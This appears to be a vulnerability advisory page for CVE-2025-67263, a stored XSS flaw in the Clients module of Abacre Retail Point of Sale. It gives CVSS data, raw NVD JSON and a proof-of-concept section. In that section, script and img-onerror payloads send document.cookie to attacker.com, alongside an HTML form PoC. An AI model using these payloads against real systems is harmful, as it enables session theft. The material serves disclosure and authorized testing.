Security Vulnerability Report
中文
CVE-2025-67263 CVSS 6.1 MEDIUM

CVE-2025-67263

Published: 2026-01-20 18:16:06
Last Modified: 2026-01-30 20:05:33

Description

Abacre Retail Point of Sale 14.0.0.396 is affected by a stored cross-site scripting (XSS) vulnerability in the Clients module. The application fails to properly sanitize user-supplied input stored in the Name and Surname fields. An attacker can insert malicious HTML or script content into these fields, which, persisted in the database.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:abacre:retail_point_of_sale:14.0.0.396:*:*:*:*:*:*:* - VULNERABLE
Abacre Retail Point of Sale <= 14.0.0.396

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-67263 PoC - Stored XSS in Abacre Retail POS Clients Module // Affected Version: Abacre Retail Point of Sale <= 14.0.0.396 // Attack Vector: Inject malicious script in Name/Surname fields // Step 1: Create or modify a client record with XSS payload in Name field const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // Example HTTP POST request to create client (authentication required) const createClientRequest = { method: 'POST', url: 'http://target.com/api/clients', headers: { 'Content-Type': 'application/json', 'Authorization': 'Bearer <session_token>' }, body: JSON.stringify({ name: xssPayload, surname: '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">' }) }; // Step 2: When admin views the clients list, XSS payload executes // Step 3: Attacker receives victim's session cookies via callback // Simple HTML PoC for manual testing: const htmlPoc = ` <form action="http://target.com/clients/new" method="POST"> <input type="text" name="name" value='<script>alert("XSS")</script>'> <input type="text" name="surname" value='<img src=x onerror=alert(document.cookie)>'> <button type="submit">Create Client</button> </form> `; console.log('PoC Generated for CVE-2025-67263');

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67263", "sourceIdentifier": "[email protected]", "published": "2026-01-20T18:16:05.677", "lastModified": "2026-01-30T20:05:33.477", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Abacre Retail Point of Sale 14.0.0.396 is affected by a stored cross-site scripting (XSS) vulnerability in the Clients module. The application fails to properly sanitize user-supplied input stored in the Name and Surname fields. An attacker can insert malicious HTML or script content into these fields, which, persisted in the database."}, {"lang": "es", "value": "Abacre Retail Point de Sale 14.0.0.396 está afectado por una vulnerabilidad de cross-site scripting (XSS) almacenado en el módulo de Clientes. La aplicación no logra sanear correctamente la entrada proporcionada por el usuario almacenada en los campos Nombre y Apellido. Un atacante puede insertar contenido HTML o de script malicioso en estos campos, el cual, persistido en la base de datos."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:abacre:retail_point_of_sale:14.0.0.396:*:*:*:*:*:*:*", "matchCriteriaId": "26ECDDB1-B28B-4AE6-AA2F-04F7012A565B"}]}]}], "references": [{"url": "https://packetstorm.news/files/id/214045/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.abacre.com/retailpointofsale/", "source": "[email protected]", "tags": ["Product"]}]}}